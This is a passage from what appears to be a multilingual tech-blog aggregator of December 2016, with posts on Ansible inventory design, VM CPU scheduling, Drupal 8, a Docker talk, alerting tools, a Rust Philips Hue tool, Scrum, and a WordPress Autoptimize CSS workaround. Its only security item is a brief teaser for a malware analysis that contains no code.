The latter might be a more generic way of exporting resources. An example. Some subtree manages the setup of a single apache site. At some point multiple sites are defined. Sites will be grouped and installed on one of multiple apache setups. Here you happen to export virtual hosts into a list of virtualhosts for one apache. In a next step, *all* those virtualhosts get exported in a big list that configures your load balancer.

We need some generic way to create lists of things grouped  by a certain parameter.

Variables get inherited throughout the inventory trees. This could happen in a way where some precedence makes one value to overwrite another, or in a way where multiple values become a list of values. This might be part of some schema for variable sets in a specific tree? Another idea might be to not care about group types, and just apply rules groups via the variable sets they carry, track which sets a group inherits from, perhaps namespace them. Define how variable sets should merge, listify, or are not allowed to be combined.

How do we plugin external data into this model? Should the equivalent of current dynamic inventory scripts be mapped on a subtree? Or span multiple locations? Be mapped on a specific variable set? Hard to say in e general rule. Lots of those inventoruy scripts focus on host and groups, and perhaps some facts. Whilst this model has a bigger focus on managing variables.

Putting some more logic in the inventory could also mean that part of the manipulation that lookup plugins perform could happen in inventory. This would greatly simplify how we write loops in roles, by being able to do everyhing with a simple standard with_items.

As Dag Wieëers summarised his view on inventory to me, a new inventory should allow us to

  1. combine data from different sources, into a single source of truth
  2. do dynamic facts manipulation
  3. have a deterministic but configurable hierarchy

Another model that users tend to use in different ways, is where the host creation happens. Some start to define it in ansible inventory, then create the host with e.g. a vmware role, other import the host list from an external inventory, e.g. ec2. The way we import inventory data from external hosts should be well defined, how we map external groups and hosts and variables into this inventory model. Of course a new inventory should have a more elaborate API, not only internally, but also shown at the json API for dynamic inventory scripts.

Now, all of this sounds probably overly complex, and overdoing this new design is a serious risk. But I do hope to come to a model with just some basic simple rules that allows to implement all these ideas. If you have ideas on this, feel free to comment here of get in touch with me to further discuss this!

 

The post Some first design ideas for an Ansible Inventory 2.0 appeared first on Serge van Ginderachter.

December 19, 2016

The post In virtual environments, less (CPU’s) is more appeared first on ma.ttias.be.

Our application is slow, let's throw more CPU's at it!

If you work in IT, either as a developer or a sysadmin, you might've heard that phrase before. Something is slow, you throw hardware at it. Well, in a virtual environment (and what isn't a VM nowadays?), that isn't always the good fix.

It's jut not just overcommitting

The obvious reason is that those CPU's need to come from somewhere and that hardware might be overloaded. If you only have 16 cores in your physical machine, it doesn't make much sense to have 4x VMs running with 8 cores each consuming 100% CPU.

Simple math tells you that 4x VMs x 8 CPUs = a demand for 32 CPUs, where your hardware can only supply 16 CPUs (1).

On the other hand, if each of those VMs would only consume 50% of their assigned CPUs, everything's fine -- right?

Well, not so much.

(1) Yes, hyperthreading, I know.

Synchronising CPU clock cycles

In the VMware world there's fancy term called %CSTP or Co-Stop. The same logic applies to Xen, KVM and any other virtualisation technology.

It boils down to this.

The %CSTP value represents the amount of time a virtual machine with multiple virtual CPUs is waiting to be scheduled on multiple cores on the physical host. The higher the value, the longer it waits and the worse its performance.
Determining if multiple virtual CPUs are causing performance issues

Or phrased differently: the Co-Stop percentage is the time a Virtual Machine is ready to run, but had to wait for the underlying hardware to schedule the CPUs it demanded on its physical hardware.

It's a CPU scheduling issue.

Imagine you have a VM with 8 CPU's assigned to it. If a new process wants to run in that VM, it requests CPU time from the kernel. That is then interpreted by the hypervisor below, translating those Virtual CPUs to physical sockets & cores.

But it has to keep the other VMs in mind too, since those might also be requesting CPU time.

And here's the catch: when a VM is ready to be scheduled, the hypervisor needs to schedule all of its allocated CPUs at the (near) same time. When your VM has 8 CPUs but only really needs 2, your hypervisor will try to schedule all 8 CPUs at the same time. That might take longer due to congestion on the hypervisor since other VMs can be asking time from those very same CPUs.

But why wait for 8 CPUs to be scheduled when in reality your VM only needed 2? That time spent waiting for the hypervisor to have 8 CPUs free to be assigned is time waisted.

This is especially apparent in cloud environments where its easy to either over-commit (as the hoster) or over-reserve (as the cloud tenant).

In general, it's a very good rule of thumb to only assign the resources you need in a virtual environment, not more, not less. Assigning more might hurt performance due to CPU scheduling congestion, assigning too little resources will cause your VM to run at 100% capacity all the time.

Don't over commit. Don't under provision. Assess your application and provision the right resources.

The post In virtual environments, less (CPU’s) is more appeared first on ma.ttias.be.

December 18, 2016

Dat mag he. Ik ben niet eens betaald door Lannoo. Ik vind wel dat ze dat ondertussen eens mogen doen hoor.

Dus. Wat is er gaande?

Haar boek, Onlife, hoe de digitale wereld je leven bepaalt, is gisteren verkozen tot Liberales Boek van het jaar 2016. De jury bestond uit filosofe Tinneke Beeckman, Liberales-kernlid Dirk Verhofstadt, Liberales-voorzitter Claude Nijs, deMens.nu-voorzitter Sylvain Peeters en Liberales-kernlid Koert Van Espen.

Ze nodigt ons allemaal van harte uit op de huldigingsavond op donderdag 26 januari 2017 om 20 uur, in het Liberaal Archief (Kramersplein 23) te Gent. Het programma ziet er als volgt uit:

Eerst wordt het Liberales-boek Theorieën over rechtvaardigheid. De John Rawlslezingen (redactie Dirk Verhofstadt) voorgesteld.

Daarna volgt de voorstelling van het boek De keuze van D66 (redactie Daniël Boomsma), met een toespraak door Vlaams parlementslid Mathias De Clercq.

Vervolgens interviewt Koert Van Espen haar over Onlife.

En na al dat voedsel voor de geest zal de ambrozijn rijkelijk vloeien tijdens de nieuwjaarsreceptie.

De toegang is gratis, maar inschrijven is verplicht via info@liberales.be.

Ja, ik vind toch wel dat de Linux community aanwezig moet zijn. Vorige keer was ik daar alleen. Wanneer komt de rest van planet.grep.be me eens steunen? We kunnen er een leuke avond van maken. Toch?!

Met vriendelijke groeten,

De philip. Niet diene die het altijd over philip-conspiracies heeft. Diene andere, die daar in mee gaat.

December 16, 2016

Some of my readers may have noticed that I recently upgraded this blog from Drupal 7 to Drupal 8. You might be wondering why it took me so long, and the truth is that while I love working on my site, it's hard to justify spending much time on it.

I did most of the work on my commute to work, cramped in a small seat on the train to the tune of the rumbling train carriage. I finally pushed the site live during Thanksgiving weekend. Nothing like seeing the Drupal migration tool run on your computer to the smell of the turkey cooking in the oven. The comfortable atmosphere of Thanksgiving -- and the glass of wine that was sitting on my desk -- made it all the more fun.

While my blog has been around for more than a decade, it isn't very complex; I have approximately 1,250 blog posts and 8,000 photos. All of the photos on my website are managed by my Album module, a custom Drupal module whose first version I wrote about ten years ago. Since its inception, I've upgraded the module to each major Drupal version from Drupal 5 to 7, and now to Drupal 8.

Upgrading my little website was relatively simple, involving porting my custom Album module, porting my theme to use Twig, and migrating the data and configuration. Though I've reviewed and committed many patches that went into Drupal 8, this was the first time I'm actually undertaking a Drupal 8 module, theme, and migration from scratch.

Each of the steps in upgrading a Drupal site have undergone substantial changes in the transition from Drupal 7 to Drupal 8. Building a module, for instance, is completely different because of the new introduction of object-oriented programming paradigms, the new routing system, and more. Writing a module in Drupal 8 is so much nicer than writing a module in Drupal 7; my code is better organized, more reusable, and better tested. Theming has been completely reinvented to use Twig. I found Twig much more pleasant to use than PHPTemplate in Drupal 7, and I'm very happy with how the theming process has improved. That said, I've to give a special shoutout to Preston So for helping me with my theme; I was painfully reminded I'm still not a designer or a CSS expert.

Overall, porting my site was a fun experience and I'm excited to be using Drupal 8. There is so much power packed into Drupal 8. Now that I've experienced Drupal 8 development from the other side of the equation, I believe even more in the decisions we made. While there is always room for improvement, Drupal 8 is a giant leap forward for Drupal.

Logo DockerCe jeudi 19 janvier 2017 à 19h se déroulera la 55ème séance montoise des Jeudis du Libre de Belgique.

Le sujet de cette séance : Docker, c’est quoi st’affaire ?

Thématique : sysadmin

Public : sysadmin|développeurs|entreprises|étudiants

L’animateur conférencier : Jean-Marc Meessen (Worldline)

Lieu de cette séance : Université de Mons, Campus Plaine de Nimy, avenue Maistriau, Grands Amphithéâtres, Auditoire Curie (cf. ce plan sur le site de l’UMONS, ou la carte OSM).

La participation sera gratuite et ne nécessitera que votre inscription nominative, de préférence préalable, ou à l’entrée de la séance. Merci d’indiquer votre intention en vous inscrivant via la page http://jeudisdulibre.fikket.com/. La séance sera suivie d’un verre de l’amitié.

Les Jeudis du Libre à Mons bénéficient aussi du soutien de nos partenaires : CETIC, Normation, MeaWeb et Phonoid.

Si vous êtes intéressé(e) par ce cycle mensuel, n’hésitez pas à consulter l’agenda et à vous inscrire sur la liste de diffusion afin de recevoir systématiquement les annonces.

Pour rappel, les Jeudis du Libre se veulent des espaces d’échanges autour de thématiques des Logiciels Libres. Les rencontres montoises se déroulent chaque troisième jeudi du mois, et sont organisées dans des locaux et en collaboration avec des Hautes Écoles et Facultés Universitaires montoises impliquées dans les formations d’informaticiens (UMONS, HEH et Condorcet), et avec le concours de l’A.S.B.L. LoLiGrUB, active dans la promotion des logiciels libres.

Description : Ce talk donnera un overview pratique de cette technologie qui buzzz. En trois ans d’existence,cette techno de conteneurisation suscite de plus en plus d’intérêt voir d’enthousiasme. Elle ouvre les portes à une manière novatrice de tester, packager et de distribuer des applications. Elle pourrait être un élément clé dans la mise en place d’une culture DevOps dans l’Entreprise.

Partant des principes de base, nous décrirons comment construire et utiliser des conteneurs simples. Nous explorerons aussi les outils pour mettre en œuvre des infrastructures plus complexes avec des outils comme “docker-compose” ou “swarm”. Rien de plus amusant que de démontrer et d’expérimenter ces outils avec un cluster de Raspberry-Pi. Nous conclurons l’exposé en faisant un état des lieux de l’utilisation de Docker en Production en général et du volet sécurité en particulier.

Short bio : Jean-Marc MEESSEN is perpetual and enthusiastic learner, admirative of all the cool stuff out there. Loves to share his discoveries and passions. A great believer in cross-silo active communities. Besides doing Java development, he is a development infrastructure expert and coaches teams on various aspects of development technology or practices and helps to build a DevOps culture in his company, Worldline.

December 15, 2016

Zij die oordelen over al waar weinig tijd voor is, nemen hun tijd om na te kijken of de voorstellers wel hun tijd genomen hebben.

December 14, 2016

I published the following diary on isc.sans.org: “UAC Bypass in JScript Dropper“.

Yesterday, one of our readers sent us a malicious piece of JScript: doc2016044457899656.pdf.js.js. It’s always interesting to have a look at samples coming from alternate sources because they may slightly differ from what we usually receive on a daily basis. Only yesterday, my spam trap collected 488 ransomware samples from the different campaigns but always based on the same techniques… [Read more]

[The post [SANS ISC Diary] UAC Bypass in JScript Dropper has been first published on /dev/random]

December 11, 2016

The Linux Professional Institute, the BSD Certification Group and The Document Foundation will offer exam sessions at FOSDEM 2017. Interested candidates can now register for exams with the respective organisations. Further details are available on the certification page.

December 10, 2016

This summer I had the opportunity to present my practical fault detection concepts and hands-on approach as conference presentations.

First at Velocity and then at SRECon16 Europe. The latter page also contains the recorded video.

image

If you’re interested at all in tackling non-trivial timeseries alerting use cases (e.g. working with seasonal or trending data) this video should be useful to you.

It’s basically me trying to convey in a concrete way why I think the big-data and math-centered algorithmic approaches come with a variety of problems making them unrealistic and unfit, whereas the real breakthroughs happen when tools recognize the symbiotic relationship between operators and software, and focus on supporting a collaborative, iterative process to managing alerting over time. There should be a harmonious relationship between operator and monitoring tool, leveraging the strengths of both sides, with minimal factors harming the interaction. From what I can tell, bosun is pioneering this concept of a modern alerting IDE and is far ahead of other alerting tools in terms of providing high alignment between alerting configuration, the infrastructure being monitored, and individual team members, which are all moving targets, often even fast moving. In my experience this results in high signal/noise alerts and a happy team. (according to Kyle, the bosun project leader, my take is a useful one)

That said, figuring out the tool and using it properly has been, and remains, rather hard. I know many who rather not fight the learning curve. Recently the bosun team has been making strides at making it easier for newcomers - e.g. reloadable configuration and Grafana integration - but there is lots more to do. Part of the reason is that some of the UI tabs aren’t implemented for non-opentsdb databases and integrating Graphite for example into the tag-focused system that is bosun, is bound to be a bit weird. (that’s on me)

For an interesting juxtaposition, we released Grafana v4 with alerting functionality which approaches the problem from the complete other side: simplicity and a unified dashboard/alerting workflow first, more advanced alerting methods later. I’m doing what I can to make the ideas of both projects converge, or at least make the projects take inspiration from each other and combine the good parts. (just as I hope to bring the ideas behind graph-explorer into Grafana, eventually…)

Note: One thing that somebody correctly pointed out to me, is that I’ve been inaccurate with my terminology. Basically, machine learning and anomaly detection can be as simple or complex as you want to make it. In particular, what we’re doing with our alerting software (e.g. bosun) can rightfully also be considered machine learning, since we construct models that learn from data and make predictions. It may not be what we think of at first, and indeed, even a simple linear regression is a machine learning model. So most of my critique was more about the big data approach to machine learning, rather than machine learning itself. As it turns out then the key to applying machine learning successfully is tooling that assists the human operator in every possible way, which is what IDE’s like bosun do and how I should have phrased it, rather than presenting it as an alternative to machine learning.

December 09, 2016

Maar, rechters moeten de wet uitvoeren. Niet zelf proberen wetten te maken. De scheiding der machten geldt in alle richtingen.

Imperator Bart heeft een punt.

Among the most important initiatives for Drupal 8's future is the "API-first initiative", whose goal is to improve Drupal's web services capabilities for building decoupled applications. In my previous blog posts, I evaluated the current state of, outlined a vision for, and mapped a path forward for Drupal's web services solutions.

In the five months since my last update, web services in Drupal have moved forward substantially in functionality and ease of use. This blog post discusses the biggest improvements.

An overview of the key building blocks to create web services in Drupal. Out of the box, Drupal core can expose raw JSON structures reflecting its internal storage, or it can expose them in HAL. Note: Waterwheel has an optional dependency on JSON API if JSON API methods are invoked through Waterwheel.js.

Core REST improvements

With the release of Drupal 8.2, the core REST API now supports important requirements for decoupled applications. First, you can now retrieve configuration entities (such as blocks and menus) as REST resources. You can also conduct user registration through the REST API. The developer experience of core REST has improved as well, with simplified REST configuration and better response messages and status codes for requests causing errors.

Moreover, you can now access Drupal content from decoupled applications and sites hosted on other domains thanks to opt-in cross-origin resource sharing (CORS) support. This is particularly useful if you have a JavaScript application hosted directly on AWS, for instance, while your Drupal repository is hosted on a separate platform. Thanks to all this progress, you can now build more feature-rich decoupled applications with Drupal.

All of these improvements are thanks to the hard work of Wim Leers (Acquia), Ted Bowman (Acquia), Daniel Wehner (Chapter Three), Clemens Tolboom, José Manuel Rodríguez Vélez, Klaus Purer, James Gilliland (APQC), and Gabe Sullice (Aten Design Group).

JSON API as an emerging standard

JSON API is a specification for REST APIs in JSON which offers several compelling advantages over the current core REST API. First, JSON API provides a standard way to query not only single entities but also all relationships tied to that entity and to perform query operations through query string parameters (for example, listing all tags associated with an article). Second, JSON API allows you to fetch lists of content entities (including filtering, sorting and paging), whereas the only options for this currently available in core are to issue multiple requests, which is undesirable for performance, or to query Drupal views, which require additional work to create.

Moreover, JSON API is increasingly common in the JavaScript community due to its adoption by developers creating REST APIs in JSON and by members of both the Ruby on Rails and Ember communities. In short, the momentum outside of Drupal currently favors JSON API over HAL. It's my belief that JSON API should become an experimental core module, and it may one day potentially even supersede HAL, Views-based REST endpoints, and more. Though Views REST exports will always be valuable for special needs, JSON API is suitable for more common tasks due to query operations needing no additional configuration. All this being said, we should discuss and evaluate the implications of prioritizing JSON API.

Thanks to the efforts of Mateu Aguiló Bosch (Lullabot) and Gabe Sullice (Aten Design Group), the JSON API module in Drupal 8 is quickly approaching a level of stability that could put it under consideration as a core experimental module.

OAuth2 bearer token authentication

One of the issues facing many decoupled applications today is the lack of a robust authentication mechanism when working with Drupal's REST API. Currently, core REST only has two options available out of the box, namely cookie-based authentication, which is unhelpful for decoupled applications on domains other than the Drupal site, and basic authentication, which is less secure than other mechanisms.

Due to its wide acceptance, OAuth2 seems a logical next step for Drupal sites that need to authenticate requests. Because it is more secure than what is available in core REST's basic authentication, OAuth2 would help developers build more secure decoupled Drupal architectures and allow us to deprecate the other less secure approaches.

It would make sense to see an OAuth2 solution such as Simple OAuth, the work of Mateu Aguiló Bosch (Lullabot), as an experimental core module, so that we can make REST APIs in Drupal more secure.

Waterwheel, Drupal's SDK ecosystem

The API-first initiative's work goes beyond making improvements on the Drupal back end. Acquia released Waterwheel.js 1.0 as open-source, the first iteration of a helper SDK for JavaScript developers. The Waterwheel.js SDK helps JavaScript developers perform requests against Drupal without requiring extensive knowledge of how Drupal's REST API functions. For example, the Waterwheel module allows you to benefit from resource discovery, which makes your JavaScript application aware of Drupal's data model. Waterwheel.js also integrates easily with the JSON API contributed module.

Thanks to Kyle Browning (Acquia), the Waterwheel.swift SDK allows developers of applications for Apple devices such as iPads, iPhones, Apple Watches, and Apple TVs to more quickly build their Drupal-powered applications. To learn more about the Waterwheel ecosystem, check the blog posts by Preston So (Acquia).

Conclusion

Thanks to the hard work of the many contributors involved, the API-first initiative is progressing with great momentum. In this post, we ended with the following conclusions:

  • The JSON API and Simple OAuth modules could be candidates for inclusion in Drupal 8 core — this is something we should discuss and evaluate.
  • We should discuss where support for HAL and JSON API stops and starts, because it helps us focus our time and effort.

If you are building decoupled applications with Drupal 8, we would benefit significantly from your impressions of the core REST API and JSON API implementations now available. What features are missing? What queries are difficult or need work? How can we make the APIs more suited to your requirements? Use the comments section on this blog post to tell us more about the work you are doing so we can learn from your experiences.

Of course, if you can help accelerate the work of the API-first initiative by contributing code, reviewing and testing patches, or merely by participating in the discussions within the issues, you will not only be helping improve Drupal itself; you'll be helping improve the experience of all developers who wish to use Drupal as their ideal API-first back end.

Special thanks to Preston So for contributions to this blog post and to Wim Leers, Angie Byron, Ted Bowman and Chris Hamper for their feedback during the writing process.

Chez les cyclistes, il y a un dicton qui dit que le nombre idéal de vélos à avoir dans son garage est N+1, où N est le nombre de vélo qu’on possède actuellement.

Oui, il y a toujours une bonne raison pour acheter un nouveau vélo : avoir un vélo de route, un VTT, un vélo de gravel. Mais si N+1 est le nombre idéal, le nombre minimal est 2. Surtout si vous utilisez votre vélo quotidiennement.

Car il n’y a qu’une seule chose de pire pour un cycliste que de devoir pédaler de nuit dans le froid et la pluie : être forcé d’utiliser une voiture !

J’ai personnellement découvert ce problème lorsque, suite à un bris de dérailleur, j’ai appris que j’allais rester dix jours sans pédaler, la pièce n’étant pas en stock.

Le lendemain, j’avais trouvé un vélo d’occasion.

Un poil vieillotte mais ayant visiblement très peu servi, cette seconde monture joue admirablement son rôle de réserviste. Je l’enfourche lorsque mon fier destrier est à l’entretien, lorsqu’il me révèle une crevaison lente le matin et que je n’ai pas le courage de changer la chambre à air avant d’aller travailler, ou lorsque la simple envie me prend de changer un peu d’air.

Après deux années de ce rythme, j’eus une intuition bizarre.

En deux ans, mon vélo principal, que j’entretiens et que je bichonne, avait subit plusieurs révisions. Il avait connu de multiples crevaisons, plusieurs jeux de pneus. Les chaînes se succédaient, les roulements devaient être changés et les câbles se grippaient.

Rien de tout cela ne semblait atteindre mon réserviste. J’avais changé une fois une chambre à air mais la chaîne et les pneus étaient toujours ceux d’origine malgré des entretiens beaucoup plus succincts voire inexistants.

Cette constatation me conduisait à une explication impitoyable : bien que plus vieux, mon réserviste était de nettement meilleure qualité. Les nouveaux vélos avec les nouveaux pneus sont fragiles et faits pour encourager la consommation.

Intuitif, non ?

Et pourtant complètement faux. Car l’usage d’un vélo ne se compare pas en temps passé dans le garage mais en kilomètres parcourus.

Comme je vous l’ai raconté, je raffole de Strava. Chacune de mes sorties est enregistrée dans l’application avec le vélo utilisé pour l’occasion. J’indique même quand je change une pièce afin de connaître le kilométrage exact de chaque composant.

Je sais ainsi que pour mon vélo principal, une bonne chaine dure 2500km alors qu’une mauvaise s’use après 1500km. Les pneus, à l’arrière, durent entre 800 et 1600km. Facilement le triple à l’avant. Outre cela, mon utilisation du vélo nécessite un passage par l’atelier en moyenne tous les 2000km. Et le vélo va sur ses 8000km.

Mon vélo de réserve, par contre, vient lui tout juste de passer les 500km !

Il est donc parfaitement normal que je n’ai eu aucun ennui, aucun entretien, aucun travail sur ce vélo : il n’a tout simplement pas encore roulé le tiers de la distance à partir de laquelle l’usure de certains composants se fait sentir.

Mon intuition était complètement trompeuse.

Cette anecdote prête à une morale générale : souvent, nous nous laissons emporter par des intuitions, des similitudes. Les deux vélos étant en permanence côte à côte dans le garage, il est normal de les comparer. Le fait de prendre de temps en temps le vélo de réserve me donnait l’impression que les deux vélos vivaient une vie presque similaire. Certes, je pensais l’utiliser trois ou quatre fois moins. Mais les chiffres révèlent qu’il s’agit de quinze fois moins !

Lorsque vous avez des convictions, des intuitions, confrontez-les aux faits, aux chiffres réels.

Beaucoup de nos problèmes viennent du fait que nous suivons aveuglément nos intuitions, même lorsque les chiffres nous démontrent l’absurdité de nos croyances. Aujourd’hui encore, les politiciens prônent l’austérité afin de relancer l’économie, ils prônent l’expulsion d’étrangers pour libérer des emplois là où tous les exemples connus ont démontré l’absurde inanité et la contre-productivité de ce genre de mesures.

Pire : aujourd’hui, il y a encore des gens pour voter pour ces politiciens.

À ceux-là, racontez-leur donc l’histoire de mon second vélo.

 

Photo par AdamNCSU.

Ce texte est a été publié grâce à votre soutien régulier sur Tipeee et sur Paypal. Je suis @ploum, blogueur, écrivain, conférencier et futurologue. Vous pouvez me suivre sur Facebook, Medium ou me contacter.

Ce texte est publié sous la licence CC-By BE.

Two of the lights in our living are Philips Hue lights.
I especially like them for their ability to reach 2000K color temperature (very warm white light), which gives a nice mellow yellowish white light.

We control the lights via normal light switches contained in the light fixture.
Due to the way Philips Hue lights work this implies that whenever we turn on the lights again they go back to the default setting of around 2700K (normal warm white).

In order to fix this once and for all I wrote a little program in rust that does this:

  • poll the state of the lights every 10 seconds (there is no subscribe/notify :( )
  • keep the light state in memory
  • if a light changes from unreachable (usually due to being turned off by the switch) to reachable (turned on by the switch), restore the hue to the last state before it became unreachable
Code is in rust (of course) and can be found at https://github.com/andete/hue_persistence.

Just run it on a local server (I use my shuttle xs36v) and it automatically starts working.
Keep in mind that it can take up to a minute for the Hue system to detect that a light is reachable again.

A short video demoing the system in action:


December 07, 2016

As a freelancer I saw many companies, many situations and worked with many Project Managers, Product Owners, Scrum Masters and god knows what names the HR department came up with.

What is most important, in my experience, is that the people leading the team try to focus the people in the group on as few common goals as possible during one sprint. The more stories or goals the team has to finish, the more individualism and the fewer things will get done (with done being defined by your definition of done).

Differently put you should try to make your team work like how a soccer team plays. You try to make three, four or five goals per sprint. But you do this as a team.

Example: When a story isn’t finished at the end of the sprint; it’s the team’s fault. Not the fault of the one guy that worked on it. The team has to find a solution. If it’s always the same guy being lazy, that’s not the project’s or the team’s results. You or HR deals with that guy later. Doing so is outside of Scrum’s scope. It’s not for your retrospective discussion. But do sanction the team for not delivering.

Another example is not to put too much stories on the task board and yet to keep stories as small and/or well defined as possible. Too much stories or too large stories will result in every individual picking a different story (or subtask of the larger story) to be responsible for. At the end of the sprint none of these will be really finished. And the developers in the team won’t care about the other features being developed during the sprint. So they will dislike having to review other people’s features. They’ll have difficulty finding a reviewer. They won’t communicate with each other. They’ll become careless and dispassionate.

Your planning caused that. That makes you a bad team player. The coach is part of the team.

If you encountered this bug but are not using Autoptimize, leave a comment below or contact me here. Your info can help understand if the regression has an impact outside of Autoptimize as well!


Gotta love Sarah, but there’s a small bug in Vaughan’s (WordPress 4.7) that breaks (part of the CSS) when Autoptimized. If you have a theme that supports custom backgrounds (e.g. TwentySixteen) and you set that custom background in the Customizer, the URL ends up escaped (well, they wp_json_encode() it actually) like this;

body{background-image: url("http:\/\/localhost\/wordpress\/wp-content\/uploads\/layerslider\/Full-width-demo-slider\/left.png");}

Which results in the Autoptimized CSS for the background-image being broken because the URL is not recognized as such. The bug has been confirmed already and the fix should land in WordPress 4.7.1.

If you’re impacted and can’t wait for 4.7.1 to be released, there are 2 workarounds:
1. simple: disable the “Aggregate inline CSS”-option
2. geeky: use this code snippet to fix the URL before AO has a change to misinterpret it;

add_filter('autoptimize_filter_html_before_minify','fix_encoded_urls');
function fix_encoded_urls($htmlIn) {
	if ( strpos($htmlIn,"body.custom-background") !== false ) {
		preg_match_all("#background-image:\s?url\(?[\"|']((http(s)?)?:\\\/\\\/.*)[\"|']\)?#",$htmlIn,$badUrls);
	  	if ($badUrls) {
			foreach ($badUrls[1] as $badUrl) {
				$htmlIn = str_replace($badUrl, stripslashes($badUrl), $htmlIn);
			}
		}
	}
  	return $htmlIn;
}